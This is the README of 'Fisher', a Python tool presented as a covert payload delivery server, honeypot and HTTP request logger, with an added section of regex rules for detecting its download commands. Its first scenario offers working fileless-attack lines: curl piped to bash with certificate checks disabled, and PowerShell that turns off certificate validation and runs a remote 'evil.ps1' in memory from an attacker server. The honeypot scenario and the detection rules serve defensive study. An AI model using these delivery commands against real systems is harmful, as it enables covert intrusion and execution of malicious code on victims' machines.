
fisher's Introduction

Fisher

Fisher is a dispatcher, honeypot and HTTP request logger.

A covert delivery program, honeypot, and HTTP request logger.

Parameters

python3 fisher.py -p [port] {-s} {-Z 0/1}

		-h / --help : show help message
		-p / --port : set server port to listen on
		-s / --tls : https support
		-z / --honeypot :
		                 '1' for elasticsearch
		                 '2' for weblogic

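Scenarios

Scenario 1: Sample delivery

step1: Manually generate a certificate in the root directory. A default certificate that is used too widely gets fingerprinted, so generating your own is strongly recommended.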

openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes

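step2: Place the files to be delivered in the data directory. After the program starts, they are automatically placed under a random directory.

step3: Run the following command.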

python3 fisher.py -p 56221 -s

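[Screenshot: 2022-07-09_135007]

step4: As shown in the screenshot above, the client can covertly download the program using the following methods, which can be used to assist in carrying out fileless attacks.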

```bash
# Linux
curl https://SERVER_IP:8443/JHB0IwokE5Y7nDUqOdaxur8Mi31Q9g/bash/1.sh -k -s|bash
wget https://SERVER_IP:8443/JHB0IwokE5Y7nDUqOdaxur8Mi31Q9g/bash/1.sh --no-check-certificate
```

```powershell
# Windows
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
iex(New-Object Net.WebClient).DownloadString('https://SERVER_IP:8443/asdW323dj293S02eaj302dj02d932/evil.ps1')

(New-Object Net.WebClient).DownloadFile('https://SERVER_IP:8443/asdW323dj293S02eaj302dj02d932/1.zip','c:\1.zip')
```
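
A defender-side sketch of how the step4 command patterns can be flagged in process command-line telemetry. This is an added example, not part of the Fisher project; the rule names, the 24-character token threshold and the sample events are assumptions constructed for illustration.

```python
import re

# Added example: heuristics for the step4 download patterns. Rule names and the
# 24-character token threshold are assumptions, not taken from the Fisher project.
RULES = {
    # curl with certificate checks off (-k / --insecure), output piped to a shell
    "curl_insecure_pipe_shell": re.compile(
        r"\bcurl\b(?=[^|]*\s(?:-[a-zA-Z]*k[a-zA-Z]*|--insecure)\b)[^|]*\|\s*(?:ba|z|da)?sh\b"),
    "wget_no_cert_check": re.compile(r"\bwget\b.*\s--no-check-certificate\b"),
    # PowerShell: certificate validation callback forced to $true
    "ps_cert_validation_disabled": re.compile(
        r"(?i)ServerCertificateValidationCallback\s*=\s*\{\s*\$true\s*\}"),
    # PowerShell: downloaded string passed straight to iex (nothing written to disk)
    "ps_download_and_execute": re.compile(
        r"(?i)\b(?:iex|Invoke-Expression)\b.*\bDownloadString\s*\("),
    "ps_download_file": re.compile(r"(?i)\bNet\.WebClient\b.*\bDownloadFile\s*\("),
    # First URL path segment is one long alphanumeric token (random directory)
    "url_random_first_segment": re.compile(r"https?://[^/\s'\"]+/[A-Za-z0-9]{24,}/"),
}


def classify(cmdline):
    """Return the sorted names of every rule matching one process command line."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))


def triage(events):
    """Keep only (host, command line) events with a hit, most rule hits first."""
    hits = [(host, cmd, classify(cmd)) for host, cmd in events]
    return sorted((h for h in hits if h[2]), key=lambda h: -len(h[2]))


# Constructed process-creation events (hosts, addresses and tokens are made up).
SAMPLES = [
    ("web01", "curl https://203.0.113.10:8443/Zk3PqA81LmXw2TnB9RcY0uVdE7sH/bash/1.sh -k -s|bash"),
    ("web01", "curl -s https://example.org/install.sh -o /tmp/install.sh"),
    ("ws07", "powershell -c \"[System.Net.ServicePointManager]::"
             "ServerCertificateValidationCallback = {$true}; "
             "iex(New-Object Net.WebClient).DownloadString("
             "'https://203.0.113.10:8443/Qm4Xt7Lz0Pa9Vb2Nc5Rd8Ke1Hs/evil.ps1')\""),
    ("ws07", "wget https://example.org/releases/tool.tar.gz"),
]

if __name__ == "__main__":
    for host, cmd, rules in triage(SAMPLES):
        print(f"{host}: {', '.join(rules)}\n    {cmd}")
```

The two benign samples produce no hits because each rule needs the combination seen in step4 (disabled certificate checks together with piping or in-memory execution, or a long random first path segment), not just the presence of curl, wget or PowerShell.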

Scenario 2: Honeypot

Provides a simple simulation of two services: Elasticsearch and WebLogic.

step1: If HTTPS support is needed, generate a certificate manually.

openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes

step2: Run the following commands.

#elasticsearch
python3 fisher.py -p 56221 -s -Z 0

#weblogic
python3 fisher.py -p 56221 -s -Z 1

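step3: Records marked in red with [H] indicate honeypot-related events. The related details are also stored in full in the log directory, even including POST data.

[Screenshot: 2022-07-09_134711]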

fisher's People

Contributors

aplyc1a
